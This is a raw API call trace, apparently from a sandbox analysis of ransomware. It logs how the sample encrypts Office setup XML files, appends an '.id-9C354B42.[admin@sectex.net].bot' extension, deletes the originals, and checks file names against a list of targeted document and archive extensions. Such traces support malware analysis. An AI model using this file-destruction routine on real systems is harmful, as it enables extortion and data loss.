	[0037.778] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Office.en-us\\BRANDING.XML.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\office.en-us\\branding.xml.id-9c354b42.[admin@sectex.net].bot")) returned 0xffffffff
	[0037.788] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Office.en-us\\BRANDING.XML" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\office.en-us\\branding.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1b4
	[0037.788] SetFilePointerEx (in: hFile=0x1b4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa69fec8 | out: lpNewFilePointer=0x0) returned 1
	[0037.788] SetFilePointerEx (in: hFile=0x1b4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa69fec8 | out: lpNewFilePointer=0x0) returned 1
	[0037.788] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Office.en-us\\BRANDING.XML.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\office.en-us\\branding.xml.id-9c354b42.[admin@sectex.net].bot"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1c4
	[0037.788] GetLastError () returned 0x0
	[0037.788] ReadFile (in: hFile=0x1b4, lpBuffer=0xb1c0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xa69fed4, lpOverlapped=0x0 | out: lpBuffer=0xb1c0020*, lpNumberOfBytesRead=0xa69fed4*=0x91975, lpOverlapped=0x0) returned 1
	[0037.870] WriteFile (in: hFile=0x1c4, lpBuffer=0xb1c0020*, nNumberOfBytesToWrite=0x91980, lpNumberOfBytesWritten=0xa69fc9c, lpOverlapped=0x0 | out: lpBuffer=0xb1c0020*, lpNumberOfBytesWritten=0xa69fc9c*=0x91980, lpOverlapped=0x0) returned 1
	[0037.881] ReadFile (in: hFile=0x1b4, lpBuffer=0xb1c0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xa69fed4, lpOverlapped=0x0 | out: lpBuffer=0xb1c0020*, lpNumberOfBytesRead=0xa69fed4*=0x0, lpOverlapped=0x0) returned 1
	[0037.881] WriteFile (in: hFile=0x1c4, lpBuffer=0xb1c0020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0xa69fc9c, lpOverlapped=0x0 | out: lpBuffer=0xb1c0020*, lpNumberOfBytesWritten=0xa69fc9c*=0xec, lpOverlapped=0x0) returned 1
	[0037.881] SetEndOfFile (hFile=0x1c4) returned 1
	[0037.881] CloseHandle (hObject=0x1c4) returned 1
	[0037.887] SetFilePointerEx (in: hFile=0x1b4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa69fec8 | out: lpNewFilePointer=0x0) returned 1
	[0037.887] SetEndOfFile (hFile=0x1b4) returned 1
	[0037.892] CloseHandle (hObject=0x1b4) returned 1
	[0037.892] SetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Office.en-us\\BRANDING.XML.id-9C354B42.[admin@sectex.net].bot", dwFileAttributes=0x20) returned 1
	[0037.892] DeleteFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Office.en-us\\BRANDING.XML" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\office.en-us\\branding.xml")) returned 1
	[0038.050] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Office.en-us\\BRANDING.XML") returned 105
	[0038.050] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Office.en-us\\BRANDING.XML") returned 105
	[0038.050] lstrlenW (lpString=".doc") returned 4
	[0038.050] lstrcmpiW (lpString1=".doc", lpString2=".XML") returned -1
	[0038.050] lstrlenW (lpString=".docx") returned 5
	[0038.050] lstrcmpiW (lpString1=".docx", lpString2="G.XML") returned -1
	[0038.050] lstrlenW (lpString=".pdf") returned 4
	[0038.050] lstrcmpiW (lpString1=".pdf", lpString2=".XML") returned -1
	[0038.050] lstrlenW (lpString=".xls") returned 4
	[0038.050] lstrcmpiW (lpString1=".xls", lpString2=".XML") returned -1
	[0038.050] lstrlenW (lpString=".xlsx") returned 5
	[0038.050] lstrcmpiW (lpString1=".xlsx", lpString2="G.XML") returned -1
	[0038.050] lstrlenW (lpString=".ppt") returned 4
	[0038.050] lstrcmpiW (lpString1=".ppt", lpString2=".XML") returned -1
	[0038.050] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Office.en-us\\BRANDING.XML") returned 105
	[0038.050] lstrlenW (lpString=".zip") returned 4
	[0038.050] lstrcmpiW (lpString1=".zip", lpString2=".XML") returned 1
	[0038.050] lstrlenW (lpString=".rar") returned 4
	[0038.050] lstrcmpiW (lpString1=".rar", lpString2=".XML") returned -1
	[0038.050] lstrlenW (lpString=".bz2") returned 4
	[0038.051] lstrcmpiW (lpString1=".bz2", lpString2=".XML") returned -1
	[0038.051] lstrlenW (lpString=".7z") returned 3
	[0038.051] lstrcmpiW (lpString1=".7z", lpString2="XML") returned -1
	[0038.051] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Office.en-us\\BRANDING.XML") returned 105
	[0038.051] lstrlenW (lpString=".dbf") returned 4
	[0038.051] lstrcmpiW (lpString1=".dbf", lpString2=".XML") returned -1
	[0038.051] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Office.en-us\\BRANDING.XML") returned 105
	[0038.051] lstrlenW (lpString=".1cd") returned 4
	[0038.051] lstrcmpiW (lpString1=".1cd", lpString2=".XML") returned -1
	[0038.051] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Office.en-us\\BRANDING.XML") returned 105
	[0038.051] lstrlenW (lpString=".jpg") returned 4
	[0038.051] lstrcmpiW (lpString1=".jpg", lpString2=".XML") returned -1
	[0038.051] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Office.en-us\\BRANDING.XML") returned 105
	[0038.051] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Office.en-us\\BRANDING.XML") returned 105
	[0038.051] lstrlenW (lpString=".doc") returned 4
	[0038.051] lstrcmpiW (lpString1=".doc", lpString2=".XML") returned -1
	[0038.051] lstrlenW (lpString=".docx") returned 5
	[0038.051] lstrcmpiW (lpString1=".docx", lpString2="G.XML") returned -1
	[0038.051] lstrlenW (lpString=".pdf") returned 4
	[0038.051] lstrcmpiW (lpString1=".pdf", lpString2=".XML") returned -1
	[0038.051] lstrlenW (lpString=".xls") returned 4
	[0038.051] lstrcmpiW (lpString1=".xls", lpString2=".XML") returned -1
	[0038.051] lstrlenW (lpString=".xlsx") returned 5
	[0038.051] lstrcmpiW (lpString1=".xlsx", lpString2="G.XML") returned -1
	[0038.051] lstrlenW (lpString=".ppt") returned 4
	[0038.051] lstrcmpiW (lpString1=".ppt", lpString2=".XML") returned -1
	[0038.051] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Office.en-us\\BRANDING.XML") returned 105
	[0038.051] lstrlenW (lpString=".zip") returned 4
	[0038.051] lstrcmpiW (lpString1=".zip", lpString2=".XML") returned 1
	[0038.051] lstrlenW (lpString=".rar") returned 4
	[0038.051] lstrcmpiW (lpString1=".rar", lpString2=".XML") returned -1
	[0038.051] lstrlenW (lpString=".bz2") returned 4
	[0038.051] lstrcmpiW (lpString1=".bz2", lpString2=".XML") returned -1
	[0038.051] lstrlenW (lpString=".7z") returned 3
	[0038.052] lstrcmpiW (lpString1=".7z", lpString2="XML") returned -1
	[0038.052] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Office.en-us\\BRANDING.XML") returned 105
	[0038.052] lstrlenW (lpString=".dbf") returned 4
	[0038.052] lstrcmpiW (lpString1=".dbf", lpString2=".XML") returned -1
	[0038.052] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Office.en-us\\BRANDING.XML") returned 105
	[0038.052] lstrlenW (lpString=".1cd") returned 4
	[0038.052] lstrcmpiW (lpString1=".1cd", lpString2=".XML") returned -1
	[0038.052] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Office.en-us\\BRANDING.XML") returned 105
	[0038.052] lstrlenW (lpString=".jpg") returned 4
	[0038.052] lstrcmpiW (lpString1=".jpg", lpString2=".XML") returned -1
	[0038.052] lstrcmpiW (lpString1=".XML", lpString2=".bot") returned 1
	[0038.052] lstrlenW (lpString="Office32WW.XML") returned 14
	[0038.052] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Office32.WW\\Office32WW.XML" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\office32.ww\\office32ww.xml"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1c8
	[0038.052] GetFileSizeEx (in: hFile=0x1c8, lpFileSize=0xa69ff1c | out: lpFileSize=0xa69ff1c*=4274) returned 1
	[0038.052] CloseHandle (hObject=0x1c8) returned 1
	[0038.052] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Office32.WW\\Office32WW.XML" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\office32.ww\\office32ww.xml")) returned 0x20
	[0038.053] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Office32.WW\\Office32WW.XML.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\office32.ww\\office32ww.xml.id-9c354b42.[admin@sectex.net].bot")) returned 0xffffffff
	[0038.053] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Office32.WW\\Office32WW.XML" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\office32.ww\\office32ww.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1c8
	[0038.053] SetFilePointerEx (in: hFile=0x1c8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa69fec8 | out: lpNewFilePointer=0x0) returned 1
	[0038.053] SetFilePointerEx (in: hFile=0x1c8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa69fec8 | out: lpNewFilePointer=0x0) returned 1
	[0038.053] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Office32.WW\\Office32WW.XML.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\office32.ww\\office32ww.xml.id-9c354b42.[admin@sectex.net].bot"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1c0
	[0038.180] GetLastError () returned 0x0
	[0038.180] ReadFile (in: hFile=0x1c8, lpBuffer=0xb1c0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xa69fed4, lpOverlapped=0x0 | out: lpBuffer=0xb1c0020*, lpNumberOfBytesRead=0xa69fed4*=0x10b2, lpOverlapped=0x0) returned 1
	[0038.238] WriteFile (in: hFile=0x1c0, lpBuffer=0xb1c0020*, nNumberOfBytesToWrite=0x10c0, lpNumberOfBytesWritten=0xa69fc9c, lpOverlapped=0x0 | out: lpBuffer=0xb1c0020*, lpNumberOfBytesWritten=0xa69fc9c*=0x10c0, lpOverlapped=0x0) returned 1
	[0038.239] ReadFile (in: hFile=0x1c8, lpBuffer=0xb1c0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xa69fed4, lpOverlapped=0x0 | out: lpBuffer=0xb1c0020*, lpNumberOfBytesRead=0xa69fed4*=0x0, lpOverlapped=0x0) returned 1
	[0038.239] WriteFile (in: hFile=0x1c0, lpBuffer=0xb1c0020*, nNumberOfBytesToWrite=0xf0, lpNumberOfBytesWritten=0xa69fc9c, lpOverlapped=0x0 | out: lpBuffer=0xb1c0020*, lpNumberOfBytesWritten=0xa69fc9c*=0xf0, lpOverlapped=0x0) returned 1
	[0038.240] SetEndOfFile (hFile=0x1c0) returned 1
	[0038.240] CloseHandle (hObject=0x1c0) returned 1
	[0038.241] SetFilePointerEx (in: hFile=0x1c8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa69fec8 | out: lpNewFilePointer=0x0) returned 1
	[0038.241] SetEndOfFile (hFile=0x1c8) returned 1
	[0038.241] CloseHandle (hObject=0x1c8) returned 1
	[0038.242] SetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Office32.WW\\Office32WW.XML.id-9C354B42.[admin@sectex.net].bot", dwFileAttributes=0x20) returned 1
	[0038.242] DeleteFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Office32.WW\\Office32WW.XML" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\office32.ww\\office32ww.xml")) returned 1
	[0038.242] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Office32.WW\\Office32WW.XML") returned 106
	[0038.242] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Office32.WW\\Office32WW.XML") returned 106
	[0038.242] lstrlenW (lpString=".doc") returned 4
	[0038.242] lstrcmpiW (lpString1=".doc", lpString2=".XML") returned -1
	[0038.242] lstrlenW (lpString=".docx") returned 5
	[0038.242] lstrcmpiW (lpString1=".docx", lpString2="W.XML") returned -1
	[0038.242] lstrlenW (lpString=".pdf") returned 4
	[0038.242] lstrcmpiW (lpString1=".pdf", lpString2=".XML") returned -1
	[0038.242] lstrlenW (lpString=".xls") returned 4
	[0038.242] lstrcmpiW (lpString1=".xls", lpString2=".XML") returned -1
	[0038.242] lstrlenW (lpString=".xlsx") returned 5
	[0038.242] lstrcmpiW (lpString1=".xlsx", lpString2="W.XML") returned -1
	[0038.242] lstrlenW (lpString=".ppt") returned 4
	[0038.242] lstrcmpiW (lpString1=".ppt", lpString2=".XML") returned -1
	[0038.242] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Office32.WW\\Office32WW.XML") returned 106
	[0038.242] lstrlenW (lpString=".zip") returned 4
	[0038.242] lstrcmpiW (lpString1=".zip", lpString2=".XML") returned 1
	[0038.242] lstrlenW (lpString=".rar") returned 4
	[0038.242] lstrcmpiW (lpString1=".rar", lpString2=".XML") returned -1
	[0038.242] lstrlenW (lpString=".bz2") returned 4
	[0038.243] lstrcmpiW (lpString1=".bz2", lpString2=".XML") returned -1
	[0038.243] lstrlenW (lpString=".7z") returned 3
	[0038.243] lstrcmpiW (lpString1=".7z", lpString2="XML") returned -1
	[0038.243] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Office32.WW\\Office32WW.XML") returned 106
	[0038.243] lstrlenW (lpString=".dbf") returned 4
	[0038.243] lstrcmpiW (lpString1=".dbf", lpString2=".XML") returned -1
	[0038.243] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Office32.WW\\Office32WW.XML") returned 106
	[0038.243] lstrlenW (lpString=".1cd") returned 4
	[0038.243] lstrcmpiW (lpString1=".1cd", lpString2=".XML") returned -1
	[0038.243] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Office32.WW\\Office32WW.XML") returned 106
	[0038.243] lstrlenW (lpString=".jpg") returned 4
	[0038.243] lstrcmpiW (lpString1=".jpg", lpString2=".XML") returned -1
	[0038.243] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Office32.WW\\Office32WW.XML") returned 106
	[0038.243] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Office32.WW\\Office32WW.XML") returned 106
	[0038.243] lstrlenW (lpString=".doc") returned 4
	[0038.243] lstrcmpiW (lpString1=".doc", lpString2=".XML") returned -1
	[0038.243] lstrlenW (lpString=".docx") returned 5
	[0038.243] lstrcmpiW (lpString1=".docx", lpString2="W.XML") returned -1
	[0038.243] lstrlenW (lpString=".pdf") returned 4
	[0038.243] lstrcmpiW (lpString1=".pdf", lpString2=".XML") returned -1
	[0038.243] lstrlenW (lpString=".xls") returned 4
	[0038.243] lstrcmpiW (lpString1=".xls", lpString2=".XML") returned -1
	[0038.243] lstrlenW (lpString=".xlsx") returned 5
	[0038.243] lstrcmpiW (lpString1=".xlsx", lpString2="W.XML") returned -1
	[0038.243] lstrlenW (lpString=".ppt") returned 4
	[0038.243] lstrcmpiW (lpString1=".ppt", lpString2=".XML") returned -1
	[0038.243] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Office32.WW\\Office32WW.XML") returned 106
	[0038.243] lstrlenW (lpString=".zip") returned 4
	[0038.243] lstrcmpiW (lpString1=".zip", lpString2=".XML") returned 1
	[0038.243] lstrlenW (lpString=".rar") returned 4
	[0038.243] lstrcmpiW (lpString1=".rar", lpString2=".XML") returned -1
	[0038.243] lstrlenW (lpString=".bz2") returned 4
	[0038.244] lstrcmpiW (lpString1=".bz2", lpString2=".XML") returned -1
	[0038.244] lstrlenW (lpString=".7z") returned 3
	[0038.244] lstrcmpiW (lpString1=".7z", lpString2="XML") returned -1
	[0038.244] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Office32.WW\\Office32WW.XML") returned 106
	[0038.244] lstrlenW (lpString=".dbf") returned 4
	[0038.244] lstrcmpiW (lpString1=".dbf", lpString2=".XML") returned -1
	[0038.244] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Office32.WW\\Office32WW.XML") returned 106
	[0038.244] lstrlenW (lpString=".1cd") returned 4
	[0038.244] lstrcmpiW (lpString1=".1cd", lpString2=".XML") returned -1
	[0038.244] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Office32.WW\\Office32WW.XML") returned 106
	[0038.244] lstrlenW (lpString=".jpg") returned 4
	[0038.244] lstrcmpiW (lpString1=".jpg", lpString2=".XML") returned -1
	[0038.244] lstrcmpiW (lpString1=".XML", lpString2=".bot") returned 1
	[0038.244] lstrlenW (lpString="SETUP.XML") returned 9
	[0038.244] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\OneNote.en-us\\SETUP.XML" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\onenote.en-us\\setup.xml"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1d0
	[0038.272] GetFileSizeEx (in: hFile=0x1d0, lpFileSize=0xa69ff1c | out: lpFileSize=0xa69ff1c*=1988) returned 1
	[0038.272] CloseHandle (hObject=0x1d0) returned 1
	[0038.281] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\OneNote.en-us\\SETUP.XML" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\onenote.en-us\\setup.xml")) returned 0x20
	[0038.281] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\OneNote.en-us\\SETUP.XML.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\onenote.en-us\\setup.xml.id-9c354b42.[admin@sectex.net].bot")) returned 0xffffffff
	[0038.282] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\OneNote.en-us\\SETUP.XML" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\onenote.en-us\\setup.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1d0
	[0038.282] SetFilePointerEx (in: hFile=0x1d0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa69fec8 | out: lpNewFilePointer=0x0) returned 1
	[0038.282] SetFilePointerEx (in: hFile=0x1d0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa69fec8 | out: lpNewFilePointer=0x0) returned 1
	[0038.282] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\OneNote.en-us\\SETUP.XML.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\onenote.en-us\\setup.xml.id-9c354b42.[admin@sectex.net].bot"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1c8
	[0038.282] GetLastError () returned 0x0
	[0038.282] ReadFile (in: hFile=0x1d0, lpBuffer=0xb1c0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xa69fed4, lpOverlapped=0x0 | out: lpBuffer=0xb1c0020*, lpNumberOfBytesRead=0xa69fed4*=0x7c4, lpOverlapped=0x0) returned 1
	[0038.285] WriteFile (in: hFile=0x1c8, lpBuffer=0xb1c0020*, nNumberOfBytesToWrite=0x7d0, lpNumberOfBytesWritten=0xa69fc9c, lpOverlapped=0x0 | out: lpBuffer=0xb1c0020*, lpNumberOfBytesWritten=0xa69fc9c*=0x7d0, lpOverlapped=0x0) returned 1
	[0038.286] ReadFile (in: hFile=0x1d0, lpBuffer=0xb1c0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xa69fed4, lpOverlapped=0x0 | out: lpBuffer=0xb1c0020*, lpNumberOfBytesRead=0xa69fed4*=0x0, lpOverlapped=0x0) returned 1
	[0038.286] WriteFile (in: hFile=0x1c8, lpBuffer=0xb1c0020*, nNumberOfBytesToWrite=0xe6, lpNumberOfBytesWritten=0xa69fc9c, lpOverlapped=0x0 | out: lpBuffer=0xb1c0020*, lpNumberOfBytesWritten=0xa69fc9c*=0xe6, lpOverlapped=0x0) returned 1
	[0038.286] SetEndOfFile (hFile=0x1c8) returned 1
	[0038.286] CloseHandle (hObject=0x1c8) returned 1
	[0038.287] SetFilePointerEx (in: hFile=0x1d0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa69fec8 | out: lpNewFilePointer=0x0) returned 1
	[0038.287] SetEndOfFile (hFile=0x1d0) returned 1
	[0038.288] CloseHandle (hObject=0x1d0) returned 1
	[0038.288] SetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\OneNote.en-us\\SETUP.XML.id-9C354B42.[admin@sectex.net].bot", dwFileAttributes=0x20) returned 1
	[0038.288] DeleteFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\OneNote.en-us\\SETUP.XML" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\onenote.en-us\\setup.xml")) returned 1
	[0038.288] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\OneNote.en-us\\SETUP.XML") returned 103
	[0038.288] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\OneNote.en-us\\SETUP.XML") returned 103
	[0038.288] lstrlenW (lpString=".doc") returned 4
	[0038.288] lstrcmpiW (lpString1=".doc", lpString2=".XML") returned -1
	[0038.288] lstrlenW (lpString=".docx") returned 5
	[0038.288] lstrcmpiW (lpString1=".docx", lpString2="P.XML") returned -1
	[0038.288] lstrlenW (lpString=".pdf") returned 4
	[0038.288] lstrcmpiW (lpString1=".pdf", lpString2=".XML") returned -1
	[0038.288] lstrlenW (lpString=".xls") returned 4
	[0038.288] lstrcmpiW (lpString1=".xls", lpString2=".XML") returned -1
	[0038.288] lstrlenW (lpString=".xlsx") returned 5
	[0038.288] lstrcmpiW (lpString1=".xlsx", lpString2="P.XML") returned -1
	[0038.288] lstrlenW (lpString=".ppt") returned 4
	[0038.288] lstrcmpiW (lpString1=".ppt", lpString2=".XML") returned -1
	[0038.288] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\OneNote.en-us\\SETUP.XML") returned 103
	[0038.288] lstrlenW (lpString=".zip") returned 4
	[0038.288] lstrcmpiW (lpString1=".zip", lpString2=".XML") returned 1
	[0038.288] lstrlenW (lpString=".rar") returned 4
	[0038.289] lstrcmpiW (lpString1=".rar", lpString2=".XML") returned -1
	[0038.289] lstrlenW (lpString=".bz2") returned 4
	[0038.289] lstrcmpiW (lpString1=".bz2", lpString2=".XML") returned -1
	[0038.289] lstrlenW (lpString=".7z") returned 3
	[0038.289] lstrcmpiW (lpString1=".7z", lpString2="XML") returned -1
	[0038.289] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\OneNote.en-us\\SETUP.XML") returned 103
	[0038.289] lstrlenW (lpString=".dbf") returned 4
	[0038.289] lstrcmpiW (lpString1=".dbf", lpString2=".XML") returned -1
	[0038.289] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\OneNote.en-us\\SETUP.XML") returned 103
	[0038.289] lstrlenW (lpString=".1cd") returned 4
	[0038.289] lstrcmpiW (lpString1=".1cd", lpString2=".XML") returned -1
	[0038.289] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\OneNote.en-us\\SETUP.XML") returned 103
	[0038.289] lstrlenW (lpString=".jpg") returned 4
	[0038.289] lstrcmpiW (lpString1=".jpg", lpString2=".XML") returned -1
	[0038.289] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\OneNote.en-us\\SETUP.XML") returned 103
	[0038.289] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\OneNote.en-us\\SETUP.XML") returned 103
	[0038.289] lstrlenW (lpString=".doc") returned 4
	[0038.289] lstrcmpiW (lpString1=".doc", lpString2=".XML") returned -1
	[0038.289] lstrlenW (lpString=".docx") returned 5
	[0038.289] lstrcmpiW (lpString1=".docx", lpString2="P.XML") returned -1
	[0038.289] lstrlenW (lpString=".pdf") returned 4
	[0038.289] lstrcmpiW (lpString1=".pdf", lpString2=".XML") returned -1
	[0038.289] lstrlenW (lpString=".xls") returned 4
	[0038.289] lstrcmpiW (lpString1=".xls", lpString2=".XML") returned -1
	[0038.289] lstrlenW (lpString=".xlsx") returned 5
	[0038.290] lstrcmpiW (lpString1=".xlsx", lpString2="P.XML") returned -1
	[0038.290] lstrlenW (lpString=".ppt") returned 4
	[0038.290] lstrcmpiW (lpString1=".ppt", lpString2=".XML") returned -1
	[0038.290] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\OneNote.en-us\\SETUP.XML") returned 103
	[0038.290] lstrlenW (lpString=".zip") returned 4
	[0038.290] lstrcmpiW (lpString1=".zip", lpString2=".XML") returned 1
	[0038.290] lstrlenW (lpString=".rar") returned 4
	[0038.290] lstrcmpiW (lpString1=".rar", lpString2=".XML") returned -1
	[0038.290] lstrlenW (lpString=".bz2") returned 4
	[0038.290] lstrcmpiW (lpString1=".bz2", lpString2=".XML") returned -1
	[0038.290] lstrlenW (lpString=".7z") returned 3
	[0038.290] lstrcmpiW (lpString1=".7z", lpString2="XML") returned -1
